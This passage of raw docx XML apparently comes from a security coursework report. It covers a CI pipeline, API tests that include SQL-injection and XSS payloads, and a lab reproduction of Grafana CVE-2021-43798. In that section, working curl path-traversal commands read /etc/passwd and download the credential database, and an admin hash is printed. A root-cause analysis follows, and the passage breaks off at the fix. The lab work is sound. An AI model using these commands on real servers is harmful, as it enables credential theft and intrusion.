                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Run tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>pytest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3685"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>16 functional and security regression tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>bandit -r app -ll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3685"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Static analysis of the application code; fails on medium/high findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SCA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>pip-audit -r requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3685"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Checks the dependencies against known CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Upload scanner reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>actions/upload-artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3685"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stores bandit-report.txt and pip-audit-report.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>A GitLab CI equivalent (.gitlab-ci.yml with the stages test, sast and sca) is included in the repository as well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="3645000"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ci-run.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="3645000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 1. The workflow runs automatically on push and finishes successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="3645000"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ci-summary.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="3645000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 2. Run summary: status Success, duration 44 s, one artifact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="2801819"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ci-bandit.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="2801819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 3. SAST step: bandit reports "No issues identified" (301 lines of code scanned).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="655568"/>
            <wp:docPr id="4" name="Picture 4"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ci-pip-audit.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="655568"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 4. SCA step: pip-audit reports "No known vulnerabilities found".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5832000" cy="1807222"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ci-artifact.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5832000" cy="1807222"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Figure 5. The security-reports artifact is uploaded and can be downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Testing and verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Locally the test suite runs with pytest and finishes with 16 passed. The API was also exercised over HTTP with curl; the table below records the observed behaviour.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4816"/>
        <w:gridCol w:w="4816"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET /api/data without a token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>401 {"error":"authorization header with a bearer token is required"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST /auth/login (correct password)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200 with access_token and token_type Bearer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GET /api/data with the token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>200 with the list of posts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST /auth/login with alice' OR '1'='1' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>401 invalid username or password (payload inert)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POST /api/posts with &lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5102"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>201, title returned as &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. CVE-2021-43798: reproduction and remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.1 Description of the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4816"/>
        <w:gridCol w:w="4816"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVE-2021-43798</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Product</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Grafana 8.x (affected 8.0.0 - 8.3.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerable version used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8.2.6 (vulhub/grafana:8.2.6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Path traversal / arbitrary file read (CWE-22)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Authentication required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CVSS v3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7.5 High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2835"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fixed in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6236"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>8.3.1, 8.2.7, 8.1.8, 8.0.7 (7 December 2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Grafana serves plugin assets through the route /public/plugins/:pluginId/*filepath. In the affected versions the handler joined the plugin directory with the attacker-controlled path and did not verify that the result stayed inside that directory. Any file readable by the grafana process could therefore be downloaded without authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Launching the vulnerable environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>git clone https://github.com/vulhub/vulhub.git</w:t>
        <w:br/>
        <w:t>cd vulhub/grafana/CVE-2021-43798</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t># cve-2021-43798-web-1   vulhub/grafana:8.2.6   Up   0.0.0.0:3000-&gt;3000/tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.3 Reproduction of the attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The attack needs no credentials; the plugin id only has to exist, and alertlist ships with Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 1 - read a file outside the web root:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl --path-as-is "http://127.0.0.1:3000/public/plugins/alertlist/</w:t>
        <w:br/>
        <w:t>../../../../../../../../../../../../../etc/passwd"</w:t>
        <w:br/>
        <w:br/>
        <w:t>HTTP 200</w:t>
        <w:br/>
        <w:t>root:x:0:0:root:/root:/bin/ash</w:t>
        <w:br/>
        <w:t>bin:x:1:1:bin:/bin:/sbin/nologin</w:t>
        <w:br/>
        <w:t>daemon:x:2:2:daemon:/sbin:/sbin/nologin</w:t>
        <w:br/>
        <w:t>adm:x:3:4:adm:/var/adm:/sbin/nologin</w:t>
        <w:br/>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Step 2 - steal the credential store:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl --path-as-is -o grafana.db "http://127.0.0.1:3000/public/plugins/alertlist/</w:t>
        <w:br/>
        <w:t>../../../../../../../../../../../../../var/lib/grafana/grafana.db"</w:t>
        <w:br/>
        <w:br/>
        <w:t>HTTP 200, 659456 bytes</w:t>
        <w:br/>
        <w:br/>
        <w:t>sqlite&gt; select login, password, salt, is_admin from user;</w:t>
        <w:br/>
        <w:t>admin | d9324a2650ef36745068f07cb6d053484915cb19bfa815e61c7d6260fd85ab2b2da3f7905e1ea9661a8f517c64b828ea5e53 | ozQBmV2nl4 | 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The downloaded database contains the administrator's PBKDF2-SHA256 hash and salt, which can be cracked offline, and the datasource credentials, which allow further movement inside the infrastructure. This turns a file-read primitive into a full compromise of the monitoring stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="5082172"/>
            <wp:docPr id="6" name="Picture 6"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="cve-vuln.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="5082172"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.4 Root cause analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The defect is a missing canonicalisation and containment check in the plugin static-file handler. The handler receives the wildcard part of the URL as filepath, concatenates it with the plugin directory and opens the result. Because the router does not normalise .. segments and the handler never calls a clean-and-prefix-check routine, the path walks out of /usr/share/grafana/public/app/plugins/&lt;id&gt;/ up to the filesystem root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>In terms of the OWASP Top 10 this is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory), which belongs to A01:2021 - Broken Access Control. It is a logic error in input handling: the code trusted a path derived from the request. The configuration of the container was default, so configuration hardening alone could not have prevented it - only the code fix does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The consequences are amplified by what Grafana stores on disk: the SQLite database with password hashes and datasource secrets, TLS private keys and grafana.ini with SMTP and OAuth credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7.5 Applied fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The environment was stopped (docker compose down) and the image tag in docker-compose.yml was changed from the vulnerable 8.2.6 to the patched 8.3.1:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="340"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>services:</w:t>
